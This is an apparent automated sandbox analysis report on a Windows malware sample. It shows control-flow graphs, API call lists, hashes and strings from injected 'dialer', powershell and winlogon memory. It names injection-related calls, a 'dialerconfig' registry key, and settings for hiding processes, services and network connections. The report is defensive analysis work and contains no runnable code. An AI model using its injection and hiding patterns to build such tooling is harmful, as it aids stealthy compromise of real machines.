                                                • Instruction Fuzzy Hash: 0DA02400F0414141D5043F70144F03C11311F41303F404430D155C5141FD1CD0340310

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 199 7ff6cd4126e8-7ff6cd412710 200 7ff6cd412716 199->200 201 7ff6cd4128be-7ff6cd4128c6 199->201 202 7ff6cd41284a-7ff6cd412882 GetProcessHeap HeapAlloc K32EnumProcesses 200->202 203 7ff6cd41271c-7ff6cd412723 200->203 204 7ff6cd412b0a-7ff6cd412b2e ReadFile 201->204 205 7ff6cd4128cc-7ff6cd4128cf 201->205 206 7ff6cd412888-7ff6cd412899 202->206 207 7ff6cd412c00-7ff6cd412c16 202->207 209 7ff6cd412729-7ff6cd41272c 203->209 210 7ff6cd412841-7ff6cd412843 ExitProcess 203->210 204->207 208 7ff6cd412b34-7ff6cd412b3b 204->208 211 7ff6cd412b00-7ff6cd412b05 call 7ff6cd411768 205->211 212 7ff6cd4128d5-7ff6cd4128da 205->212 206->207 214 7ff6cd41289f-7ff6cd4128b7 call 7ff6cd4110c0 206->214 208->207 215 7ff6cd412b41-7ff6cd412b55 call 7ff6cd4119ac 208->215 216 7ff6cd412732-7ff6cd412735 209->216 217 7ff6cd4127e4-7ff6cd41280f RegOpenKeyExW 209->217 211->207 218 7ff6cd4128e0-7ff6cd4128e3 212->218 219 7ff6cd412aa5-7ff6cd412ab8 call 7ff6cd411a44 212->219 240 7ff6cd4128b9 214->240 215->207 241 7ff6cd412b5b-7ff6cd412b61 215->241 225 7ff6cd41273b-7ff6cd41273e 216->225 226 7ff6cd4127d5-7ff6cd4127df 216->226 223 7ff6cd412811-7ff6cd41281f RegDeleteValueW 217->223 224 7ff6cd412825-7ff6cd41283c call 7ff6cd411ac4 call 7ff6cd411768 call 7ff6cd411000 call 7ff6cd4117f8 217->224 228 7ff6cd412921-7ff6cd412932 call 7ff6cd411a44 218->228 229 7ff6cd4128e5-7ff6cd4128ea 218->229 219->207 244 7ff6cd412abe-7ff6cd412acd call 7ff6cd411a44 219->244 223->224 224->207 235 7ff6cd4127c8-7ff6cd4127d0 225->235 236 7ff6cd412744-7ff6cd412749 225->236 226->207 228->207 247 7ff6cd412938-7ff6cd41295a ReadFile 228->247 229->207 230 7ff6cd4128f0-7ff6cd41291a call 7ff6cd411958 call 7ff6cd411984 ExitProcess 229->230 235->207 236->207 243 7ff6cd41274f-7ff6cd412773 ReadFile 236->243 240->207 248 7ff6cd412b67-7ff6cd412ba2 GetProcessHeap HeapAlloc call 7ff6cd4114e4 241->248 249 7ff6cd412beb 241->249 243->207 251 7ff6cd412779-7ff6cd412780 243->251 244->207 261 7ff6cd412ad3-7ff6cd412afb ShellExecuteW 244->261 247->207 254 7ff6cd412960-7ff6cd412967 247->254 270 7ff6cd412ba4-7ff6cd412baa 248->270 271 7ff6cd412bd5-7ff6cd412bdb GetProcessHeap 248->271 255 7ff6cd412bf2-7ff6cd412bfb call 7ff6cd412c18 249->255 251->207 258 7ff6cd412786-7ff6cd41279a call 7ff6cd4119ac 251->258 254->207 263 7ff6cd41296d-7ff6cd4129ab GetProcessHeap HeapAlloc ReadFile 254->263 255->207 258->207 274 7ff6cd4127a0-7ff6cd4127a6 258->274 261->207 268 7ff6cd412a97-7ff6cd412aa0 GetProcessHeap 263->268 269 7ff6cd4129b1-7ff6cd4129bd 263->269 275 7ff6cd412bde-7ff6cd412be9 HeapFree 268->275 269->268 276 7ff6cd4129c3-7ff6cd4129cf 269->276 270->271 272 7ff6cd412bac-7ff6cd412bbe 270->272 271->275 277 7ff6cd412bc0-7ff6cd412bc2 272->277 278 7ff6cd412bc4-7ff6cd412bcc 272->278 280 7ff6cd4127a8-7ff6cd4127b7 call 7ff6cd4110c0 274->280 281 7ff6cd4127bc-7ff6cd4127c3 274->281 275->207 276->268 282 7ff6cd4129d5-7ff6cd4129e0 276->282 277->278 283 7ff6cd412bd0 call 7ff6cd4116d8 277->283 278->271 284 7ff6cd412bce 278->284 280->207 281->255 286 7ff6cd4129e2-7ff6cd4129ed 282->286 287 7ff6cd412a05-7ff6cd412a91 lstrlenW GetProcessHeap HeapAlloc call 7ff6cd4118b8 * 3 call 7ff6cd412c18 GetProcessHeap HeapFree 282->287 283->271 284->272 286->268 291 7ff6cd4129f3-7ff6cd412a00 call 7ff6cd411db4 286->291 287->268 291->268
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2924905425.00007FF6CD411000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CD410000, based on PE: true
                                                • Associated: 00000010.00000002.2924450368.00007FF6CD410000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925506926.00007FF6CD413000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925780072.00007FF6CD416000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_7ff6cd410000_dialer.jbxd
                                                Similarity
                                                • API ID: Process$Open$File$CloseExitFindHeapName$AllocChangeDeleteEnumHandleInformationModuleNotificationPathProcessesQueryReadTokenValueWow64lstrlen
                                                • String ID: SOFTWARE$dialerstager$open
                                                • API String ID: 4281403370-3931493855
                                                • Opcode ID: cc2dfd10ca6ce89d0433c572e31964bbe7f0f3f3498935daffa8bcdb63cf822c
                                                • Instruction ID: a02435de3006761983981c2acb8eada9cf98da0f9f180f678de952db611bb0d9
                                                • Opcode Fuzzy Hash: cc2dfd10ca6ce89d0433c572e31964bbe7f0f3f3498935daffa8bcdb63cf822c
                                                • Instruction Fuzzy Hash: D0D17425B0868386EB759F2598452FA26A5FF44746F00C135EBADC7698FF3CE628C700

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2924905425.00007FF6CD411000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CD410000, based on PE: true
                                                • Associated: 00000010.00000002.2924450368.00007FF6CD410000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925506926.00007FF6CD413000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925780072.00007FF6CD416000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_7ff6cd410000_dialer.jbxd
                                                Similarity
                                                • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                • String ID: @
                                                • API String ID: 3462610200-2766056989
                                                • Opcode ID: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
                                                • Instruction ID: 1c0504e01f5aae1af58b566edbb50e1cf06e0efc9c8d1df760400389a83d5596
                                                • Opcode Fuzzy Hash: 703b8677555c06e2b0f299b5c9a482d004feef9bba7614f76242c0c17f04cdf7
                                                • Instruction Fuzzy Hash: 3461A032B04A018AEB50CF26E84476D77A1FB49B89F008136DF9D97B98EF38E565C744
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2924905425.00007FF6CD411000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CD410000, based on PE: true
                                                • Associated: 00000010.00000002.2924450368.00007FF6CD410000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925506926.00007FF6CD413000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925780072.00007FF6CD416000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_7ff6cd410000_dialer.jbxd
                                                Similarity
                                                • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                • String ID: dialersvc64
                                                • API String ID: 4184240511-3881820561
                                                • Opcode ID: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
                                                • Instruction ID: 641a6c56c2ed80dfb9bd08f3935a6aff151130db6bf588d313c2a2e969f807fd
                                                • Opcode Fuzzy Hash: 1cf1482e3e3cd0594537fe81606e3316bc30941842e87169c6508401709d1003
                                                • Instruction Fuzzy Hash: C9415E36B04B4696E710DF25E8442AD37B6FB89B89F048136EF5E87A24EF38D159C300
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2924905425.00007FF6CD411000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CD410000, based on PE: true
                                                • Associated: 00000010.00000002.2924450368.00007FF6CD410000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925506926.00007FF6CD413000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925780072.00007FF6CD416000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_7ff6cd410000_dialer.jbxd
                                                Similarity
                                                • API ID: Delete$CloseEnumOpen
                                                • String ID: SOFTWARE\dialerconfig
                                                • API String ID: 3013565938-461861421
                                                • Opcode ID: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
                                                • Instruction ID: bff30f74de25c2dbf8b106208499362d24f016a991465370f7c7d6c51706dc63
                                                • Opcode Fuzzy Hash: e1473c9d781940c188c1c4810ff800916bd5dc84dd697936dace2937510ea816
                                                • Instruction Fuzzy Hash: 0711A722B18A86C1E760CF24E8487B977A5FB44759F408235D7AD8A99CEF3CD258CB04
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2924905425.00007FF6CD411000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CD410000, based on PE: true
                                                • Associated: 00000010.00000002.2924450368.00007FF6CD410000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925506926.00007FF6CD413000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925780072.00007FF6CD416000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_7ff6cd410000_dialer.jbxd
                                                Similarity
                                                • API ID: File$Write$CloseCreateHandle
                                                • String ID: \\.\pipe\dialercontrol_redirect64
                                                • API String ID: 148219782-3440882674
                                                • Opcode ID: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
                                                • Instruction ID: 2308d3e4af11f9fe74826c11089dc3af72b5141567e49237b84a54449a9f22a9
                                                • Opcode Fuzzy Hash: e51fa25a04711743f107767099e23b895b2e502b334cde0a5e9bfd5133e6eec8
                                                • Instruction Fuzzy Hash: E5114C66B14B5182E7108F15E408329A7A1FB89BE5F448225DBAD83B94EF7CD519CB40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2924905425.00007FF6CD411000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6CD410000, based on PE: true
                                                • Associated: 00000010.00000002.2924450368.00007FF6CD410000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925506926.00007FF6CD413000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                • Associated: 00000010.00000002.2925780072.00007FF6CD416000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_7ff6cd410000_dialer.jbxd
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: ntdll.dll
                                                • API String ID: 1646373207-2227199552
                                                • Opcode ID: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
                                                • Instruction ID: ed07f85a0f089e9c8ee42a1cdd4123c6edbdff5f12e7a071cd59d4e5d620f002
                                                • Opcode Fuzzy Hash: 2932c76e980009a225b48c98ed69798072b802092a4ae1a9bffd161348126381
                                                • Instruction Fuzzy Hash: 93D0A984F26603C2EE088F62A8590306212AF09B82B888030CEBE86310FF2CD0B88300
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1863105425.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffd9b8c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: U
                                                • API String ID: 0-3372436214
                                                • Opcode ID: 960a99c94f9caa6e0cda30997c89e696df5bed644e4250f63445ef59014151ec
                                                • Instruction ID: 6b11e367165c0b8c555c6ef675c92023c50a5a91d92332b13d23f20f69651249
                                                • Opcode Fuzzy Hash: 960a99c94f9caa6e0cda30997c89e696df5bed644e4250f63445ef59014151ec
                                                • Instruction Fuzzy Hash: B021383090CA4C4FDB589BAC884A6F67BE0EB96331F10426FD059C31A2DA745417CB91
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1864295849.00007FFD9B990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B990000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffd9b990000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9c18ea077a104892fe29b01afbb2aff4265b86784360be807c70bff538801ac7
                                                • Instruction ID: f9095f90a11915bbfa838a738c203d8bcb15a1de108a8bf2143e5c6d2d1370ea
                                                • Opcode Fuzzy Hash: 9c18ea077a104892fe29b01afbb2aff4265b86784360be807c70bff538801ac7
                                                • Instruction Fuzzy Hash: 85A14A32B1E7895FE7B7976858646A47BE0EF46620B0A01FFD09CC72E3D9086D06C351
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1864295849.00007FFD9B990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B990000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffd9b990000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 03d2ac6acc9c8e88b8358886e04bae2d45da9dfe4d4460f9802ec6872334db34
                                                • Instruction ID: 28e3763238d964f25a8f156667e5997e11394cc3d80c46e8730643b308fe21be
                                                • Opcode Fuzzy Hash: 03d2ac6acc9c8e88b8358886e04bae2d45da9dfe4d4460f9802ec6872334db34
                                                • Instruction Fuzzy Hash: 12512632B1EA4A5FEBFA9A5C586177477C2EF84620B1A00BED05EC72E3DE14E9058345
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1863105425.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffd9b8c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0d2cce2bb1a69ad230713e360ac6e6de7ef4cf2cb8672051a60c23d74a5d0a83
                                                • Instruction ID: 03d98f07e7e55c2710006b9bcf9a9e0c08f3dfa2615b925d67baaf1a4484d06f
                                                • Opcode Fuzzy Hash: 0d2cce2bb1a69ad230713e360ac6e6de7ef4cf2cb8672051a60c23d74a5d0a83
                                                • Instruction Fuzzy Hash: 6A31D67191CB8C8FDB58DB5C9C4A6A97BE0FB59320F00426FE449D3252DA74A855CBC2
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1864295849.00007FFD9B990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B990000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffd9b990000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2232d9f4bab35cdf4578b2842d95b9122b714d875a7838a68aa82be259920e6b
                                                • Instruction ID: e7dda312f272013e32f5c725f208be3f20adb515b7b996d87df10d2f47b985f7
                                                • Opcode Fuzzy Hash: 2232d9f4bab35cdf4578b2842d95b9122b714d875a7838a68aa82be259920e6b
                                                • Instruction Fuzzy Hash: F321D422B2F94A5FE7FA965858B023467C1EF54610B5A00BED05DC76E3DE18ED008345
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1862076500.00007FFD9B7AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7AD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffd9b7ad000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f646d12e96cfe6726d538514cf63b9474d4ad915bda2ebae94654ca775954ea1
                                                • Instruction ID: cc17e704699df11ac4e30cfd0ce4c77cdeb95bc7a086d79abca9f17dec18dd92
                                                • Opcode Fuzzy Hash: f646d12e96cfe6726d538514cf63b9474d4ad915bda2ebae94654ca775954ea1
                                                • Instruction Fuzzy Hash: 19113D3150CF088F9BA8EF1DE4859667BE1FB98321B21066FD45DC7665D731E881CB82
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1864295849.00007FFD9B990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B990000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffd9b990000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 976e82675355d2a5e06a5ec5a477743f10366b11249cf8d08ccd47e9096a6657
                                                • Instruction ID: 9a2312172a43edd5149fbfb1dac4402d70d9d3a07dfd41bbcbdbe3a9ecfa8e66
                                                • Opcode Fuzzy Hash: 976e82675355d2a5e06a5ec5a477743f10366b11249cf8d08ccd47e9096a6657
                                                • Instruction Fuzzy Hash: 3211E032B2F9495FEBFA969894606B477D1EF44720B4A00BEE42DC76A2E919AD00C340
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1863105425.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffd9b8c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c01522aee3b7a599d2a889ef33527c7ee16a54378dd15f4d4a9fe84dd1ce5310
                                                • Instruction ID: e67db4fdf9ac7ab583224fc22a2236a69ec782eeeb4ba271dd5a29cfb93ba4a3
                                                • Opcode Fuzzy Hash: c01522aee3b7a599d2a889ef33527c7ee16a54378dd15f4d4a9fe84dd1ce5310
                                                • Instruction Fuzzy Hash: 6C01447121CB0C4FD748EF4CE451AA5B7E0FB99364F10056EE58AC36A5D626E881CB45
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1863105425.00007FFD9B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffd9b8c0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8e11bb5f00697a751fcc6a86d8c8f46a75323d3f4fc0f7c720474b83d30c73da
                                                • Instruction ID: 5e17a2e793223a977cbee810b5e6b6de758bd29af6eb7a5272e55581feff7400
                                                • Opcode Fuzzy Hash: 8e11bb5f00697a751fcc6a86d8c8f46a75323d3f4fc0f7c720474b83d30c73da
                                                • Instruction Fuzzy Hash: A8F02430809A8D8FDB06EF6888259E57FE0FF26210B05029BE458C70B2DB74A558CBC2
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.1864295849.00007FFD9B990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B990000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_7ffd9b990000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3d38cf2df41a71e7fd719056ab098251107c78763863e01c65dc15b724f5a7a1
                                                • Instruction ID: e9062ea87dda00a7464c40ba49611efa747d27457e93ebc7433ec7c2b2436e38
                                                • Opcode Fuzzy Hash: 3d38cf2df41a71e7fd719056ab098251107c78763863e01c65dc15b724f5a7a1
                                                • Instruction Fuzzy Hash: AAF0A03171CF044FE748EE2DE449BA2B7E0FBA8310F10462FE44AC3295DA21E8818782

                                                Execution Graph

                                                Execution Coverage:1.7%
                                                Dynamic/Decrypted Code Coverage:95.1%
                                                Signature Coverage:0%
                                                Total number of Nodes:122
                                                Total number of Limit Nodes:16
                                                execution_graph 14005 225dc643b99 14008 225dc643ae6 14005->14008 14006 225dc643b50 14007 225dc643b36 VirtualQuery 14007->14006 14007->14008 14008->14006 14008->14007 14009 225dc643b6a VirtualAlloc 14008->14009 14009->14006 14010 225dc643b9b GetLastError 14009->14010 14010->14006 14010->14008 14011 225dc612908 14012 225dc612936 14011->14012 14013 225dc612994 VirtualAlloc 14012->14013 14016 225dc612aa7 14012->14016 14015 225dc6129b8 14013->14015 14013->14016 14014 225dc612a2b LoadLibraryA 14014->14015 14015->14014 14015->14016 14017 225dc642a7c 14019 225dc642ac1 14017->14019 14018 225dc642b20 14019->14018 14021 225dc643930 14019->14021 14022 225dc64393d StrCmpNIW 14021->14022 14023 225dc643952 14021->14023 14022->14023 14023->14019 14024 225dc641c28 14029 225dc641650 GetProcessHeap HeapAlloc 14024->14029 14026 225dc641c3e Sleep SleepEx 14027 225dc641c37 14026->14027 14027->14026 14028 225dc6415c0 StrCmpIW StrCmpW 14027->14028 14028->14027 14073 225dc641274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14029->14073 14031 225dc641678 14074 225dc641274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14031->14074 14033 225dc641689 14075 225dc641274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14033->14075 14035 225dc641692 14076 225dc641274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14035->14076 14037 225dc64169b 14038 225dc6416b6 RegOpenKeyExW 14037->14038 14039 225dc6416e8 RegOpenKeyExW 14038->14039 14040 225dc6418ce 14038->14040 14041 225dc641727 RegOpenKeyExW 14039->14041 14042 225dc641711 14039->14042 14040->14027 14044 225dc64174b 14041->14044 14045 225dc641762 RegOpenKeyExW 14041->14045 14084 225dc6412c8 RegQueryInfoKeyW 14042->14084 14077 225dc64104c RegQueryInfoKeyW 14044->14077 14048 225dc641786 14045->14048 14049 225dc64179d RegOpenKeyExW 14045->14049 14051 225dc6412c8 16 API calls 14048->14051 14052 225dc6417d8 RegOpenKeyExW 14049->14052 14053 225dc6417c1 14049->14053 14057 225dc641793 RegCloseKey 14051->14057 14055 225dc6417fc 14052->14055 14056 225dc641813 RegOpenKeyExW 14052->14056 14054 225dc6412c8 16 API calls 14053->14054 14058 225dc6417ce RegCloseKey 14054->14058 14059 225dc6412c8 16 API calls 14055->14059 14060 225dc641837 14056->14060 14061 225dc64184e RegOpenKeyExW 14056->14061 14057->14049 14058->14052 14062 225dc641809 RegCloseKey 14059->14062 14063 225dc64104c 6 API calls 14060->14063 14064 225dc641889 RegOpenKeyExW 14061->14064 14065 225dc641872 14061->14065 14062->14056 14066 225dc641844 RegCloseKey 14063->14066 14068 225dc6418c4 RegCloseKey 14064->14068 14069 225dc6418ad 14064->14069 14067 225dc64104c 6 API calls 14065->14067 14066->14061 14071 225dc64187f RegCloseKey 14067->14071 14068->14040 14070 225dc64104c 6 API calls 14069->14070 14072 225dc6418ba RegCloseKey 14070->14072 14071->14064 14072->14068 14073->14031 14074->14033 14075->14035 14076->14037 14078 225dc6410b9 14077->14078 14079 225dc6411b5 RegCloseKey 14077->14079 14078->14079 14080 225dc6410c7 RegEnumValueW 14078->14080 14079->14045 14082 225dc64111c 14080->14082 14081 225dc641149 GetProcessHeap HeapAlloc 14081->14082 14082->14079 14082->14080 14082->14081 14083 225dc64117f GetProcessHeap HeapFree 14082->14083 14083->14082 14085 225dc641499 RegCloseKey 14084->14085 14086 225dc641334 GetProcessHeap HeapAlloc 14084->14086 14085->14041 14087 225dc641485 GetProcessHeap HeapFree 14086->14087 14088 225dc64135d RegEnumValueW 14086->14088 14087->14085 14092 225dc6413af 14088->14092 14090 225dc6413dd GetProcessHeap HeapAlloc 14090->14092 14091 225dc64142f lstrlenW GetProcessHeap HeapAlloc StrCpyW 14091->14092 14092->14087 14092->14088 14092->14090 14092->14091 14093 225dc641413 GetProcessHeap HeapFree 14092->14093 14094 225dc641554 14092->14094 14093->14091 14097 225dc6415a4 14094->14097 14098 225dc64156e 14094->14098 14095 225dc641585 StrCmpIW 14095->14098 14096 225dc64158d StrCmpW 14096->14098 14097->14092 14098->14095 14098->14096 14098->14097 14099 225dc64562d 14101 225dc645634 14099->14101 14100 225dc64569b 14101->14100 14102 225dc645717 VirtualProtect 14101->14102 14103 225dc645751 14102->14103 14104 225dc645743 GetLastError 14102->14104 14104->14103 14105 225dc645dd0 14106 225dc645ddd 14105->14106 14107 225dc645de9 14106->14107 14108 225dc645efa 14106->14108 14109 225dc645e1e 14107->14109 14113 225dc645e6d 14107->14113 14111 225dc645f21 VirtualProtect FlushInstructionCache 14108->14111 14112 225dc645fde 14108->14112 14110 225dc645e46 SetThreadContext 14109->14110 14110->14113 14111->14108 14114 225dc645ffe 14112->14114 14127 225dc6444c0 14112->14127 14123 225dc644ed0 GetCurrentProcess 14114->14123 14116 225dc646003 14118 225dc646057 14116->14118 14119 225dc646017 ResumeThread 14116->14119 14131 225dc647a20 14118->14131 14120 225dc64604b 14119->14120 14120->14116 14122 225dc64609f 14124 225dc644eec 14123->14124 14125 225dc644f02 VirtualProtect FlushInstructionCache 14124->14125 14126 225dc644f33 14124->14126 14125->14124 14126->14116 14129 225dc6444dc 14127->14129 14128 225dc64453f 14128->14114 14129->14128 14130 225dc6444f2 VirtualFree 14129->14130 14130->14129 14132 225dc647a29 14131->14132 14133 225dc647a34 14132->14133 14134 225dc64820c IsProcessorFeaturePresent 14132->14134 14133->14122 14135 225dc648224 14134->14135 14138 225dc648400 RtlCaptureContext 14135->14138 14137 225dc648237 14137->14122 14139 225dc64841a RtlLookupFunctionEntry 14138->14139 14140 225dc648469 14139->14140 14141 225dc648430 RtlVirtualUnwind 14139->14141 14140->14137 14141->14139 14141->14140

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.2930567357.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_225dc640000_winlogon.jbxd
                                                Similarity
                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                • API String ID: 106492572-2879589442
                                                • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction ID: 84d0a864ffcbc837ecc7354a3d772abf192ae96d0213883569f1f6ea5f421f72
                                                • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                • Instruction Fuzzy Hash: 18711F3A324F60A6EB109FA9E85869D37B4F784F8AF509521DE4E57B69EF38C445C300

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 51 225dc645c10-225dc645c37 52 225dc645c39-225dc645c48 51->52 53 225dc645c4b-225dc645c56 GetCurrentThreadId 51->53 52->53 54 225dc645c58-225dc645c5d 53->54 55 225dc645c62-225dc645c69 53->55 56 225dc64608f-225dc6460a6 call 225dc647a20 54->56 57 225dc645c7b-225dc645c8f 55->57 58 225dc645c6b-225dc645c76 call 225dc645a40 55->58 61 225dc645c9e-225dc645ca4 57->61 58->56 64 225dc645caa-225dc645cb3 61->64 65 225dc645d75-225dc645d96 61->65 67 225dc645cfa-225dc645d6d call 225dc6445f0 call 225dc644590 call 225dc644550 64->67 68 225dc645cb5-225dc645cf8 call 225dc6486a0 64->68 71 225dc645d9c-225dc645dbc GetThreadContext 65->71 72 225dc645eff-225dc645f10 call 225dc64759f 65->72 79 225dc645d70 67->79 68->79 76 225dc645efa 71->76 77 225dc645dc2-225dc645de3 71->77 82 225dc645f15-225dc645f1b 72->82 76->72 77->76 85 225dc645de9-225dc645df2 77->85 79->61 88 225dc645f21-225dc645f78 VirtualProtect FlushInstructionCache 82->88 89 225dc645fde-225dc645fee 82->89 86 225dc645e72-225dc645e83 85->86 87 225dc645df4-225dc645e05 85->87 95 225dc645ef5 86->95 96 225dc645e85-225dc645ea3 86->96 91 225dc645e07-225dc645e1c 87->91 92 225dc645e6d 87->92 93 225dc645fa9-225dc645fd9 call 225dc64798c 88->93 94 225dc645f7a-225dc645f84 88->94 98 225dc645ffe-225dc64600a call 225dc644ed0 89->98 99 225dc645ff0-225dc645ff7 89->99 91->92 101 225dc645e1e-225dc645e68 call 225dc643a50 SetThreadContext 91->101 92->95 93->82 94->93 102 225dc645f86-225dc645fa1 call 225dc644470 94->102 96->95 103 225dc645ea5-225dc645ef0 call 225dc6439e0 call 225dc6475bd 96->103 112 225dc64600f-225dc646015 98->112 99->98 105 225dc645ff9 call 225dc6444c0 99->105 101->92 102->93 103->95 105->98 116 225dc646057-225dc646075 112->116 117 225dc646017-225dc646055 ResumeThread call 225dc64798c 112->117 120 225dc646089 116->120 121 225dc646077-225dc646086 116->121 117->112 120->56 121->120
                                                APIs
                                                Memory Dump Source
